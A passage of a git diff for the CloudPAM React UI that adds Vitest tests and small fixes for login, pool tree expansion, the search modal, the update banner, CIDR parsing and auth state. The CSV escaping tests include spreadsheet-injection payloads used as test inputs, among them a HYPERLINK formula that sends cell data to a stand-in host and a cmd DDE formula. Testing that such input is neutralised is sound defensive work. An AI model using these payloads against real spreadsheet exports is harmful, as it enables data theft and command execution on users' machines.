+    expect(screen.getByRole('button', { name: 'Sign In' })).toBeTruthy()
+  })
+
+  it('hides the password form when local auth is disabled', () => {
+    mockUseAuth.mockReturnValue(auth({ localAuthEnabled: false }))
+    mockUseOIDCProviders.mockReturnValue(
+      providers([{ id: 'okta', name: 'Okta' }]),
+    )
+
+    renderPage()
+
+    expect(screen.queryByRole('button', { name: 'Sign In' })).toBeNull()
+    expect(screen.getByText('Sign in with Okta')).toBeTruthy()
+    expect(screen.getByText('Local password sign-in is disabled for this deployment.')).toBeTruthy()
+  })
+
+  it('renders an SSO link per enabled provider alongside local auth', () => {
+    mockUseOIDCProviders.mockReturnValue(
+      providers([
+        { id: 'okta', name: 'Okta' },
+        { id: 'entra id', name: 'Entra ID' },
+      ]),
+    )
+
+    renderPage()
+
+    expect(screen.getByRole('button', { name: 'Sign In' })).toBeTruthy()
+    expect(screen.getByText('or')).toBeTruthy()
+
+    const okta = screen.getByText('Sign in with Okta').closest('a') as HTMLAnchorElement
+    expect(okta.getAttribute('href')).toBe('/api/v1/auth/oidc/login?provider_id=okta')
+
+    const entra = screen.getByText('Sign in with Entra ID').closest('a') as HTMLAnchorElement
+    expect(entra.getAttribute('href')).toBe('/api/v1/auth/oidc/login?provider_id=entra%20id')
+  })
+
+  it('warns when neither local auth nor SSO is available', () => {
+    mockUseAuth.mockReturnValue(auth({ localAuthEnabled: false }))
+
+    renderPage()
+
+    expect(
+      screen.getByText('Local authentication is disabled and no SSO providers are enabled.'),
+    ).toBeTruthy()
+  })
+
+  it('does not warn while providers are still loading', () => {
+    mockUseAuth.mockReturnValue(auth({ localAuthEnabled: false }))
+    mockUseOIDCProviders.mockReturnValue(providers([], true))
+
+    renderPage()
+
+    expect(
+      screen.queryByText('Local authentication is disabled and no SSO providers are enabled.'),
+    ).toBeNull()
+  })
+
+  it('submits credentials and navigates home on success', async () => {
+    loginWithPassword.mockResolvedValue(undefined)
+
+    renderPage()
+    await signIn('  admin  ', 'correct-horse-battery')
+
+    await waitFor(() => {
+      expect(loginWithPassword).toHaveBeenCalledWith('admin', 'correct-horse-battery')
+    })
+    await waitFor(() => {
+      expect(mockNavigate).toHaveBeenCalledWith('/')
+    })
+  })
+
+  it('shows the server error and stays on the page when sign-in fails', async () => {
+    loginWithPassword.mockRejectedValue(new Error('invalid credentials'))
+
+    renderPage()
+    await signIn('admin', 'wrong-password')
+
+    expect(await screen.findByText('invalid credentials')).toBeTruthy()
+    expect(mockNavigate).not.toHaveBeenCalled()
+  })
+
+  it('keeps the submit button disabled until both fields are filled', () => {
+    renderPage()
+
+    const submit = screen.getByRole('button', { name: 'Sign In' }) as HTMLButtonElement
+    expect(submit.disabled).toBe(true)
+
+    fireEvent.change(screen.getByPlaceholderText('admin'), { target: { value: 'admin' } })
+    expect(submit.disabled).toBe(true)
+
+    const passwordInput = document.querySelector('input[autocomplete="current-password"]') as HTMLInputElement
+    fireEvent.change(passwordInput, { target: { value: 'secret' } })
+    expect(submit.disabled).toBe(false)
+  })
+
+  it('toggles password visibility with an accessible control', () => {
+    renderPage()
+
+    const passwordInput = document.querySelector('input[autocomplete="current-password"]') as HTMLInputElement
+    expect(passwordInput.type).toBe('password')
+
+    fireEvent.click(screen.getByRole('button', { name: 'Show password' }))
+    expect(passwordInput.type).toBe('text')
+
+    fireEvent.click(screen.getByRole('button', { name: 'Hide password' }))
+    expect(passwordInput.type).toBe('password')
+  })
+})

--- a/ui/src/__tests__/PoolTree.test.tsx
+++ b/ui/src/__tests__/PoolTree.test.tsx
@@ -1,0 +1,98 @@
+import { fireEvent, render, screen } from '@testing-library/react'
+import { describe, expect, it, vi } from 'vitest'
+import PoolTree from '../components/PoolTree'
+import type { PoolWithStats } from '../api/types'
+
+function pool(id: number, name: string, cidr: string, children: PoolWithStats[] = []): PoolWithStats {
+  return {
+    id,
+    name,
+    cidr,
+    type: 'supernet',
+    status: 'active',
+    created_at: '2026-01-01T00:00:00Z',
+    children,
+  } as PoolWithStats
+}
+
+// root -> region -> environment, so there is a node that starts expanded
+// (depth 0) and a node that starts collapsed (depth 1).
+const nodes: PoolWithStats[] = [
+  pool(1, 'Root', '10.0.0.0/8', [
+    pool(2, 'Region', '10.0.0.0/12', [pool(3, 'Environment', '10.0.0.0/16')]),
+  ]),
+]
+
+function renderTree() {
+  return render(<PoolTree nodes={nodes} onSelect={vi.fn()} />)
+}
+
+describe('PoolTree global expand controls', () => {
+  it('renders the first level expanded and deeper levels collapsed by default', () => {
+    renderTree()
+
+    expect(screen.getByText('Root')).toBeTruthy()
+    expect(screen.getByText('Region')).toBeTruthy()
+    expect(screen.queryByText('Environment')).toBeNull()
+  })
+
+  it('Expand All reveals every descendant', () => {
+    renderTree()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Expand All' }))
+
+    expect(screen.getByText('Region')).toBeTruthy()
+    expect(screen.getByText('Environment')).toBeTruthy()
+  })
+
+  it('Collapse All collapses the initially expanded root node', () => {
+    renderTree()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Collapse All' }))
+
+    expect(screen.getByText('Root')).toBeTruthy()
+    expect(screen.queryByText('Region')).toBeNull()
+    expect(screen.queryByText('Environment')).toBeNull()
+  })
+
+  it('Collapse All still collapses after an Expand All', () => {
+    renderTree()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Expand All' }))
+    expect(screen.getByText('Environment')).toBeTruthy()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Collapse All' }))
+    expect(screen.queryByText('Region')).toBeNull()
+  })
+
+  it('reapplies Collapse All after a manual expand of the same node', () => {
+    renderTree()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Collapse All' }))
+    expect(screen.queryByText('Region')).toBeNull()
+
+    // The root's chevron is the only toggle rendered while collapsed.
+    const toggles = screen.getAllByRole('button').filter(b => b.textContent === '')
+    fireEvent.click(toggles[0])
+    expect(screen.getByText('Region')).toBeTruthy()
+
+    // A second Collapse All must reach the node the user re-expanded by hand.
+    fireEvent.click(screen.getByRole('button', { name: 'Collapse All' }))
+    expect(screen.queryByText('Region')).toBeNull()
+  })
+
+  it('reapplies Expand All after a manual collapse', () => {
+    renderTree()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Expand All' }))
+    expect(screen.getByText('Environment')).toBeTruthy()
+
+    const toggles = screen.getAllByRole('button').filter(b => b.textContent === '')
+    fireEvent.click(toggles[0])
+    expect(screen.queryByText('Region')).toBeNull()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Expand All' }))
+    expect(screen.getByText('Region')).toBeTruthy()
+    expect(screen.getByText('Environment')).toBeTruthy()
+  })
+})

--- a/ui/src/__tests__/SearchModal.test.tsx
+++ b/ui/src/__tests__/SearchModal.test.tsx
@@ -1,0 +1,90 @@
+import { fireEvent, render, screen } from '@testing-library/react'
+import { MemoryRouter } from 'react-router-dom'
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import SearchModal from '../components/SearchModal'
+
+const mockUseSearch = vi.hoisted(() => vi.fn())
+
+vi.mock('../hooks/useSearch', () => ({
+  useSearch: () => mockUseSearch(),
+}))
+
+function renderModal(open: boolean, onClose: () => void) {
+  return render(
+    <MemoryRouter>
+      <SearchModal open={open} onClose={onClose} />
+    </MemoryRouter>,
+  )
+}
+
+describe('SearchModal', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+    mockUseSearch.mockReturnValue({
+      query: '',
+      setQuery: vi.fn(),
+      results: null,
+      loading: false,
+      error: null,
+    })
+  })
+
+  it('closes when Escape is pressed, as the footer hint advertises', () => {
+    const onClose = vi.fn()
+    renderModal(true, onClose)
+
+    expect(screen.getByText('Esc')).toBeTruthy()
+
+    fireEvent.keyDown(document, { key: 'Escape' })
+
+    expect(onClose).toHaveBeenCalledTimes(1)
+  })
+
+  it('closes when Escape is pressed while the search input has focus', () => {
+    const onClose = vi.fn()
+    renderModal(true, onClose)
+
+    const input = screen.getByPlaceholderText('Search pools, accounts, or enter an IP address...')
+    fireEvent.keyDown(input, { key: 'Escape' })
+
+    expect(onClose).toHaveBeenCalledTimes(1)
+  })
+
+  it('ignores other keys', () => {
+    const onClose = vi.fn()
+    renderModal(true, onClose)
+
+    fireEvent.keyDown(document, { key: 'Enter' })
+    fireEvent.keyDown(document, { key: 'a' })
+
+    expect(onClose).not.toHaveBeenCalled()
+  })
+
+  it('does not listen for Escape while closed', () => {
+    const onClose = vi.fn()
+    renderModal(false, onClose)
+
+    fireEvent.keyDown(document, { key: 'Escape' })
+
+    expect(onClose).not.toHaveBeenCalled()
+  })
+
+  it('removes the key listener when it unmounts', () => {
+    const onClose = vi.fn()
+    const { unmount } = renderModal(true, onClose)
+
+    unmount()
+    fireEvent.keyDown(document, { key: 'Escape' })
+
+    expect(onClose).not.toHaveBeenCalled()
+  })
+
+  it('still closes when the backdrop is clicked', () => {
+    const onClose = vi.fn()
+    renderModal(true, onClose)
+
+    fireEvent.click(screen.getByTestId('search-panel').parentElement as HTMLElement)
+
+    expect(onClose).toHaveBeenCalledTimes(1)
+  })
+})

--- a/ui/src/__tests__/SetupPage.test.tsx
+++ b/ui/src/__tests__/SetupPage.test.tsx
@@ -1,0 +1,60 @@
+import { fireEvent, render, screen } from '@testing-library/react'
+import { MemoryRouter } from 'react-router-dom'
+import { beforeEach, describe, expect, it, vi } from 'vitest'
+import SetupPage from '../pages/SetupPage'
+
+const mockUseAuth = vi.hoisted(() => vi.fn())
+const mockNavigate = vi.hoisted(() => vi.fn())
+
+vi.mock('../hooks/useAuth', () => ({
+  useAuth: () => mockUseAuth(),
+}))
+
+vi.mock('react-router-dom', async () => {
+  const actual = await vi.importActual<typeof import('react-router-dom')>('react-router-dom')
+  return { ...actual, useNavigate: () => mockNavigate }
+})
+
+function renderPage() {
+  return render(
+    <MemoryRouter>
+      <SetupPage />
+    </MemoryRouter>,
+  )
+}
+
+describe('SetupPage password visibility toggle', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+    mockUseAuth.mockReturnValue({ needsSetup: true, authChecked: true })
+  })
+
+  it('exposes an accessible name for assistive technology', () => {
+    renderPage()
+
+    expect(screen.getByRole('button', { name: 'Show password' })).toBeTruthy()
+  })
+
+  it('updates the accessible name and pressed state when toggled', () => {
+    renderPage()
+
+    const toggle = screen.getByRole('button', { name: 'Show password' })
+    expect(toggle.getAttribute('aria-pressed')).toBe('false')
+
+    fireEvent.click(toggle)
+
+    const pressed = screen.getByRole('button', { name: 'Hide password' })
+    expect(pressed.getAttribute('aria-pressed')).toBe('true')
+  })
+
+  it('reveals the password field when toggled on', () => {
+    renderPage()
+
+    const password = screen.getByPlaceholderText('Minimum 12 characters') as HTMLInputElement
+    expect(password.type).toBe('password')
+
+    fireEvent.click(screen.getByRole('button', { name: 'Show password' }))
+
+    expect(password.type).toBe('text')
+  })
+})

--- a/ui/src/__tests__/UpdateBanner.test.tsx
+++ b/ui/src/__tests__/UpdateBanner.test.tsx
@@ -1,0 +1,104 @@
+import { fireEvent, render, screen, waitFor } from '@testing-library/react'
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'
+import UpdateBanner from '../components/UpdateBanner'
+
+const mockUseAuth = vi.hoisted(() => vi.fn())
+const mockCheckForUpdates = vi.hoisted(() => vi.fn())
+
+vi.mock('../hooks/useAuth', () => ({
+  useAuth: () => mockUseAuth(),
+}))
+
+vi.mock('../api/client', () => ({
+  checkForUpdates: (force?: boolean) => mockCheckForUpdates(force),
+  triggerUpgrade: vi.fn(),
+  getUpgradeStatus: vi.fn(),
+  acknowledgeUpgradeStatus: vi.fn(),
+}))
+
+vi.mock('../utils/upgradeReload', () => ({
+  scheduleFrontendResetAfterUpgrade: vi.fn(),
+}))
+
+const originalLocalStorage = Object.getOwnPropertyDescriptor(window, 'localStorage')
+
+function installThrowingLocalStorage() {
+  const throwing = {
+    getItem: () => {
+      throw new DOMException('The operation is insecure.', 'SecurityError')
+    },
+    setItem: () => {
+      throw new DOMException('The operation is insecure.', 'SecurityError')
+    },
+    removeItem: () => {
+      throw new DOMException('The operation is insecure.', 'SecurityError')
+    },
+    clear: () => {},
+    key: () => null,
+    length: 0,
+  }
+  Object.defineProperty(window, 'localStorage', { value: throwing, configurable: true })
+}
+
+describe('UpdateBanner storage resilience', () => {
+  beforeEach(() => {
+    vi.clearAllMocks()
+    mockUseAuth.mockReturnValue({ role: 'admin' })
+    mockCheckForUpdates.mockResolvedValue({
+      current_version: '0.8.0',
+      latest_version: '0.9.0',
+      update_available: true,
+      release_notes: '',
+      upgrade_supported: false,
+      checked_at: '2026-01-01T00:00:00Z',
+    })
+  })
+
+  afterEach(() => {
+    if (originalLocalStorage) {
+      Object.defineProperty(window, 'localStorage', originalLocalStorage)
+    }
+    window.localStorage.clear()
+  })
+
+  it('renders the banner when reading the dismissed version throws', async () => {
+    installThrowingLocalStorage()
+
+    render(<UpdateBanner />)
+
+    expect(await screen.findByText('CloudPAM v0.9.0 is available')).toBeTruthy()
+  })
+
+  it('dismisses without crashing when writing to storage throws', async () => {
+    installThrowingLocalStorage()
+
+    render(<UpdateBanner />)
+    const dismiss = await screen.findByRole('button', { name: 'Dismiss' })
+
+    expect(() => fireEvent.click(dismiss)).not.toThrow()
+
+    await waitFor(() => {
+      expect(screen.queryByText('CloudPAM v0.9.0 is available')).toBeNull()
+    })
+  })
+
+  it('persists the dismissed version when storage works', async () => {
+    render(<UpdateBanner />)
+    fireEvent.click(await screen.findByRole('button', { name: 'Dismiss' }))
+
+    await waitFor(() => {
+      expect(window.localStorage.getItem('cloudpam_dismissed_update_version')).toBe('0.9.0')
+    })
+  })
+
+  it('hides the banner for an already dismissed version', async () => {
+    window.localStorage.setItem('cloudpam_dismissed_update_version', '0.9.0')
+
+    render(<UpdateBanner />)
+
+    await waitFor(() => {
+      expect(mockCheckForUpdates).toHaveBeenCalled()
+    })
+    expect(screen.queryByText('CloudPAM v0.9.0 is available')).toBeNull()
+  })
+})

--- a/ui/src/__tests__/UpdatesPageUpgradeGating.test.tsx
+++ b/ui/src/__tests__/UpdatesPageUpgradeGating.test.tsx
@@ -27,7 +27,7 @@ describe('UpdatesPage upgrade gating', () => {
   const showToast = vi.fn()
   const triggerUpgrade = vi.fn()
 
-  function setup(status: UpdateStatusResponse) {
+  function setup(status: UpdateStatusResponse, summaryOverrides: Record<string, unknown> = {}) {
     mockUseAuth.mockReturnValue({ role: 'admin' })
     mockUseToast.mockReturnValue({ showToast })
     mockUseUpdates.mockReturnValue({
@@ -35,6 +35,7 @@ describe('UpdatesPage upgrade gating', () => {
         current_version: '0.8.0',
         latest_version: '0.9.0',
         update_available: true,
+        ...summaryOverrides,
       },
       status,
       loadingSummary: false,
@@ -90,5 +91,28 @@ describe('UpdatesPage upgrade gating', () => {
     render(<UpdatesPage />)
 
     expect(screen.getByRole('button', { name: 'Upgrade to v0.9.0' })).toHaveProperty('disabled', true)
+  })
+
+  it('disables the upgrade button when the server reports upgrades are unsupported', () => {
+    setup({ status: 'idle' }, { upgrade_supported: false })
+
+    render(<UpdatesPage />)
+
+    const button = screen.getByRole('button', { name: 'Upgrade to v0.9.0' })
+    expect(button).toHaveProperty('disabled', true)
+    expect(button.getAttribute('title')).toBe('In-app upgrades are not supported by this deployment')
+
+    fireEvent.click(button)
+    expect(triggerUpgrade).not.toHaveBeenCalled()
+  })
+
+  it('enables the upgrade button when the server reports upgrades are supported', () => {
+    setup({ status: 'idle' }, { upgrade_supported: true })
+
+    render(<UpdatesPage />)
+
+    const button = screen.getByRole('button', { name: 'Upgrade to v0.9.0' })
+    expect(button).toHaveProperty('disabled', false)
+    expect(button.getAttribute('title')).toBeNull()
   })
 })

--- a/ui/src/__tests__/cidr.test.ts
+++ b/ui/src/__tests__/cidr.test.ts
@@ -16,6 +16,22 @@ describe('parse', () => {
     expect(result.prefixLen).toBe(24)
     expect(result.octets).toEqual([192, 168, 1, 0])
   })
+
+  it('returns an unsigned ipNum for high-bit addresses', () => {
+    // 172.16.0.0 stays positive, but anything above 127.255.255.255 sets the
+    // sign bit of the 32-bit shift result.
+    expect(parse('172.16.0.0/12').ipNum).toBe(0xac100000)
+    expect(parse('192.168.1.0/24').ipNum).toBe(0xc0a80100)
+    expect(parse('128.0.0.0/8').ipNum).toBe(0x80000000)
+    expect(parse('255.255.255.255/32').ipNum).toBe(0xffffffff)
+  })
+
+  it('round-trips high-bit addresses through toIp', () => {
+    for (const cidr of ['192.168.1.0/24', '224.0.0.0/4', '255.255.255.255/32']) {
+      const ip = cidr.split('/')[0]
+      expect(toIp(parse(cidr).ipNum)).toBe(ip)
+    }
+  })
 })
 
 describe('toIp', () => {

--- a/ui/src/__tests__/csv.test.ts
+++ b/ui/src/__tests__/csv.test.ts
@@ -1,0 +1,76 @@
+import { describe, it, expect } from 'vitest'
+import { escapeCsvCell, toCsvRow, toCsv } from '../utils/csv'
+
+describe('escapeCsvCell', () => {
+  it('leaves plain values untouched', () => {
+    expect(escapeCsvCell('prod-vpc')).toBe('prod-vpc')
+    expect(escapeCsvCell('10.0.0.0/8')).toBe('10.0.0.0/8')
+  })
+
+  it('renders null and undefined as empty cells', () => {
+    expect(escapeCsvCell(null)).toBe('')
+    expect(escapeCsvCell(undefined)).toBe('')
+  })
+
+  it('quotes values containing a delimiter', () => {
+    expect(escapeCsvCell('us-east-1, us-west-2')).toBe('"us-east-1, us-west-2"')
+  })
+
+  it('quotes and doubles embedded quotes', () => {
+    expect(escapeCsvCell('say "hi"')).toBe('"say ""hi"""')
+  })
+
+  it('quotes values containing newlines', () => {
+    expect(escapeCsvCell('line1\nline2')).toBe('"line1\nline2"')
+    expect(escapeCsvCell('line1\r\nline2')).toBe('"line1\r\nline2"')
+  })
+
+  it('neutralises spreadsheet formula prefixes', () => {
+    expect(escapeCsvCell('=1+1')).toBe("'=1+1")
+    expect(escapeCsvCell('+SUM(A1)')).toBe("'+SUM(A1)")
+    expect(escapeCsvCell('-2+3')).toBe("'-2+3")
+    expect(escapeCsvCell('@SUM(A1)')).toBe("'@SUM(A1)")
+  })
+
+  it('neutralises the classic HYPERLINK exfiltration payload', () => {
+    expect(escapeCsvCell('=HYPERLINK("http://evil.test?d="&A1,"click")')).toBe(
+      '"\'=HYPERLINK(""http://evil.test?d=""&A1,""click"")"',
+    )
+  })
+
+  it('escapes a formula that also needs quoting', () => {
+    expect(escapeCsvCell('=cmd|"/c calc"!A1')).toBe('"\'=cmd|""/c calc""!A1"')
+  })
+
+  it('does not mangle names that merely contain a dash', () => {
+    expect(escapeCsvCell('us-east-1')).toBe('us-east-1')
+  })
+})
+
+describe('toCsvRow', () => {
+  it('joins escaped cells with commas', () => {
+    expect(toCsvRow(['prod', '10.0.0.0/8', null])).toBe('prod,10.0.0.0/8,')
+  })
+
+  it('keeps injected commas inside a single field', () => {
+    expect(toCsvRow(['a,b', 'c'])).toBe('"a,b",c')
+  })
+})
+
+describe('toCsv', () => {
+  it('emits a header row followed by escaped data rows', () => {
+    const csv = toCsv(
+      ['name', 'cidr', 'type', 'parent_name'],
+      [
+        ['prod', '10.0.0.0/16', 'environment', 'root'],
+        ['=evil()', '10.1.0.0/16', 'environment', 'root, primary'],
+      ],
+    )
+
+    expect(csv.split('\n')).toEqual([
+      'name,cidr,type,parent_name',
+      'prod,10.0.0.0/16,environment,root',
+      "'=evil(),10.1.0.0/16,environment,\"root, primary\"",
+    ])
+  })
+})

--- a/ui/src/__tests__/format.test.ts
+++ b/ui/src/__tests__/format.test.ts
@@ -1,6 +1,7 @@
 import { describe, it, expect } from 'vitest'
 import {
   formatHostCount,
+  formatTimeAgo,
   getHostCount,
   getPoolTypeColor,
   getUtilizationColor,
@@ -47,6 +48,35 @@ describe('getHostCount', () => {
 
   it('returns 0 for invalid CIDR', () => {
     expect(getHostCount('invalid')).toBe(0)
+  })
+
+  it('returns 0 for prefix lengths above /32', () => {
+    expect(getHostCount('10.0.0.0/33')).toBe(0)
+    expect(getHostCount('10.0.0.0/128')).toBe(0)
+  })
+
+  it('returns 0 for negative prefix lengths', () => {
+    expect(getHostCount('10.0.0.0/-1')).toBe(0)
+  })
+
+  it('computes /0 as the full IPv4 space', () => {
+    expect(getHostCount('0.0.0.0/0')).toBe(4294967296)
+  })
+})
+
+describe('formatTimeAgo', () => {
+  it('returns unknown for empty input', () => {
+    expect(formatTimeAgo('')).toBe('unknown')
+  })
+
+  it('returns unknown for an unparseable timestamp instead of NaN', () => {
+    expect(formatTimeAgo('not-a-date')).toBe('unknown')
+    expect(formatTimeAgo('2026-13-45T99:99:99Z')).toBe('unknown')
+  })
+
+  it('formats a recent timestamp', () => {
+    const oneHourAgo = new Date(Date.now() - 60 * 60 * 1000).toISOString()
+    expect(formatTimeAgo(oneHourAgo)).toBe('1 hour ago')
   })
 })
 

--- a/ui/src/__tests__/useAuthPersistedRole.test.ts
+++ b/ui/src/__tests__/useAuthPersistedRole.test.ts
@@ -1,0 +1,138 @@
+import { act, renderHook, waitFor } from '@testing-library/react'
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'
+import { useAuthState } from '../hooks/useAuth'
+
+const health = { auth_enabled: true, local_auth_enabled: true, needs_setup: false }
+
+function mockFetch(meStatus: number, meBody?: unknown) {
+  return vi.fn(async (input: RequestInfo | URL) => {
+    const url = String(input)
+    if (url === '/healthz') {
+      return { ok: true, status: 200, json: async () => health } as Response
+    }
+    if (url === '/api/v1/auth/me') {
+      return {
+        ok: meStatus >= 200 && meStatus < 300,
+        status: meStatus,
+        json: async () => meBody ?? {},
+      } as Response
+    }
+    throw new Error(`unexpected fetch: ${url}`)
+  })
+}
+
+describe('useAuthState does not trust persisted authorization state', () => {
+  beforeEach(() => {
+    window.localStorage.clear()
+    vi.restoreAllMocks()
+  })
+
+  afterEach(() => {
+    window.localStorage.clear()
+  })
+
+  it('ignores a role forged in localStorage', async () => {
+    window.localStorage.setItem('cloudpam_role', 'admin')
+    window.localStorage.setItem('cloudpam_permissions', JSON.stringify(['settings:read', 'users:list']))
+    vi.stubGlobal('fetch', mockFetch(401))
+
+    const { result } = renderHook(() => useAuthState())
+
+    // Before the server responds, nothing is granted.
+    expect(result.current.role).toBeNull()
+    expect(result.current.permissions).toEqual([])
+    expect(result.current.hasPermission('settings:read')).toBe(false)
+
+    await waitFor(() => {
+      expect(result.current.authChecked).toBe(true)
+    })
+
+    expect(result.current.isAuthenticated).toBe(false)
+    expect(result.current.role).toBeNull()
+    expect(result.current.hasPermission('settings:read')).toBe(false)
+  })
+
+  it('clears legacy role and permission keys on an unauthenticated check', async () => {
+    window.localStorage.setItem('cloudpam_role', 'admin')
+    window.localStorage.setItem('cloudpam_permissions', JSON.stringify(['settings:read']))
+    vi.stubGlobal('fetch', mockFetch(401))
+
+    const { result } = renderHook(() => useAuthState())
+    await waitFor(() => {
+      expect(result.current.authChecked).toBe(true)
+    })
+
+    expect(window.localStorage.getItem('cloudpam_role')).toBeNull()
+    expect(window.localStorage.getItem('cloudpam_permissions')).toBeNull()
+  })
+
+  it('uses only the server response for role and permissions', async () => {
+    window.localStorage.setItem('cloudpam_role', 'admin')
+    vi.stubGlobal(
+      'fetch',
+      mockFetch(200, {
+        role: 'viewer',
+        auth_type: 'session',
+        permissions: ['pools:read'],
+        user: { username: 'alice', display_name: 'Alice', role: 'viewer' },
+      }),
+    )
+
+    const { result } = renderHook(() => useAuthState())
+    await waitFor(() => {
+      expect(result.current.isAuthenticated).toBe(true)
+    })
+
+    expect(result.current.role).toBe('viewer')
+    expect(result.current.permissions).toEqual(['pools:read'])
+    expect(result.current.hasPermission('pools:read')).toBe(true)
+    expect(result.current.hasPermission('settings:read')).toBe(false)
+  })
+
+  it('does not persist role or permissions after a server-validated session', async () => {
+    vi.stubGlobal(
+      'fetch',
+      mockFetch(200, {
+        role: 'admin',
+        auth_type: 'session',
+        permissions: ['settings:read'],
+        user: { username: 'root', display_name: 'Root', role: 'admin' },
+      }),
+    )
+
+    const { result } = renderHook(() => useAuthState())
+    await waitFor(() => {
+      expect(result.current.isAuthenticated).toBe(true)
+    })
+
+    expect(window.localStorage.getItem('cloudpam_role')).toBeNull()
+    expect(window.localStorage.getItem('cloudpam_permissions')).toBeNull()
+    // Display-only metadata is still persisted.
+    expect(window.localStorage.getItem('cloudpam_key_name')).toBe('Root')
+  })
+
+  it('drops role and permissions on a forced logout event', async () => {
+    vi.stubGlobal(
+      'fetch',
+      mockFetch(200, {
+        role: 'admin',
+        auth_type: 'session',
+        permissions: ['settings:read'],
+        user: { username: 'root', display_name: 'Root', role: 'admin' },
+      }),
+    )
+
+    const { result } = renderHook(() => useAuthState())
+    await waitFor(() => {
+      expect(result.current.hasPermission('settings:read')).toBe(true)
+    })
+
+    act(() => {
+      window.dispatchEvent(new Event('auth:logout'))
+    })
+
+    expect(result.current.role).toBeNull()
+    expect(result.current.permissions).toEqual([])
+    expect(result.current.hasPermission('settings:read')).toBe(false)
+  })
+})

--- a/ui/src/components/PoolTree.tsx
+++ b/ui/src/components/PoolTree.tsx
@@ -1,4 +1,4 @@
-import { useState } from 'react'
+import { useEffect, useState } from 'react'
 import { ChevronRight, ChevronDown } from 'lucide-react'
 import type { PoolWithStats } from '../api/types'
 import { formatHostCount, getPoolTypeColor, getUtilizationColor } from '../utils/format'
@@ -9,20 +9,31 @@ interface PoolTreeProps {
   onSelect: (pool: PoolWithStats) => void
 }
 
+// A bump-counted command so that every click of Expand/Collapse All reaches
+// every node, including ones the user has already toggled by hand.
+interface ExpandCommand {
+  expand: boolean
+  seq: number
+}
+
 export default function PoolTree({ nodes, selectedId, onSelect }: PoolTreeProps) {
-  const [expandAll, setExpandAll] = useState(false)
+  const [command, setCommand] = useState<ExpandCommand | null>(null)
+
+  function issue(expand: boolean) {
+    setCommand(prev => ({ expand, seq: (prev?.seq ?? 0) + 1 }))
+  }
 
   return (
     <div>
       <div className="flex gap-2 mb-3">
         <button
-          onClick={() => setExpandAll(true)}
+          onClick={() => issue(true)}
           className="text-xs text-blue-600 dark:text-blue-400 hover:text-blue-800 dark:hover:text-blue-300"
         >
           Expand All
         </button>
         <button
-          onClick={() => setExpandAll(false)}
+          onClick={() => issue(false)}
           className="text-xs text-blue-600 dark:text-blue-400 hover:text-blue-800 dark:hover:text-blue-300"
         >
           Collapse All
@@ -36,7 +47,7 @@ export default function PoolTree({ nodes, selectedId, onSelect }: PoolTreeProps)
             depth={0}
             selectedId={selectedId}
             onSelect={onSelect}
-            forceExpand={expandAll}
+            command={command}
           />
         ))}
       </div>
@@ -49,12 +60,20 @@ interface TreeNodeProps {
   depth: number
   selectedId?: number | null
   onSelect: (pool: PoolWithStats) => void
-  forceExpand: boolean
+  command: ExpandCommand | null
 }
 
-function TreeNode({ node, depth, selectedId, onSelect, forceExpand }: TreeNodeProps) {
+function TreeNode({ node, depth, selectedId, onSelect, command }: TreeNodeProps) {
   const [expanded, setExpanded] = useState(depth < 1)
-  const isExpanded = forceExpand || expanded
+  const commandSeq = command?.seq ?? 0
+  const commandExpand = command?.expand ?? false
+
+  useEffect(() => {
+    if (commandSeq === 0) return
+    setExpanded(commandExpand)
+  }, [commandSeq, commandExpand])
+
+  const isExpanded = expanded
   const hasChildren = node.children && node.children.length > 0
   const isSelected = selectedId === node.id
 
@@ -105,7 +124,7 @@ function TreeNode({ node, depth, selectedId, onSelect, forceExpand }: TreeNodePr
               depth={depth + 1}
               selectedId={selectedId}
               onSelect={onSelect}
-              forceExpand={forceExpand}
+              command={command}
             />
           ))}
         </div>

--- a/ui/src/components/SearchModal.tsx
+++ b/ui/src/components/SearchModal.tsx
@@ -21,6 +21,19 @@ export default function SearchModal({ open, onClose }: SearchModalProps) {
     }
   }, [open, setQuery])
 
+  // The footer advertises Esc, so honour it globally while the modal is open.
+  useEffect(() => {
+    if (!open) return
+    function handleKeyDown(e: KeyboardEvent) {
+      if (e.key === 'Escape') {
+        e.preventDefault()
+        onClose()
+      }
+    }
+    document.addEventListener('keydown', handleKeyDown)
+    return () => document.removeEventListener('keydown', handleKeyDown)
+  }, [open, onClose])
+
   function handleSelect(type: 'pool' | 'account') {
     navigate(type === 'pool' ? '/pools' : '/accounts')
     onClose()

--- a/ui/src/components/UpdateBanner.tsx
+++ b/ui/src/components/UpdateBanner.tsx
@@ -7,6 +7,24 @@ const POLL_INTERVAL_MS = 60 * 60 * 1000
 const STATUS_POLL_INTERVAL_MS = 5000
 const DISMISSED_VERSION_KEY = 'cloudpam_dismissed_update_version'
 
+// localStorage access throws in restricted contexts (Safari private browsing,
+// blocked cookies). Dismissal is a convenience, so degrade instead of crashing.
+function readDismissedVersion(): string | null {
+  try {
+    return localStorage.getItem(DISMISSED_VERSION_KEY)
+  } catch {
+    return null
+  }
+}
+
+function writeDismissedVersion(version: string) {
+  try {
+    localStorage.setItem(DISMISSED_VERSION_KEY, version)
+  } catch {
+    // Dismissal simply won't persist across reloads.
+  }
+}
+
 function renderNotes(notes: string) {
   return notes
     .split('\n')
@@ -37,7 +55,7 @@ export default function UpdateBanner() {
     async function poll(force = false) {
       try {
         const result = await checkForUpdates(force)
-        const dismissed = localStorage.getItem(DISMISSED_VERSION_KEY)
+        const dismissed = readDismissedVersion()
         if (result.update_available && dismissed !== result.latest_version) {
           setUpdateAvailable(true)
           setLatestVersion(result.latest_version)
@@ -149,7 +167,7 @@ export default function UpdateBanner() {
           {upgradeStep == null && latestVersion && (
             <button
               onClick={() => {
-                localStorage.setItem(DISMISSED_VERSION_KEY, latestVersion)
+                writeDismissedVersion(latestVersion)
                 setUpdateAvailable(false)
               }}
               className="px-3 py-1.5 text-sm rounded bg-white/15 hover:bg-white/20"

--- a/ui/src/hooks/useAuth.ts
+++ b/ui/src/hooks/useAuth.ts
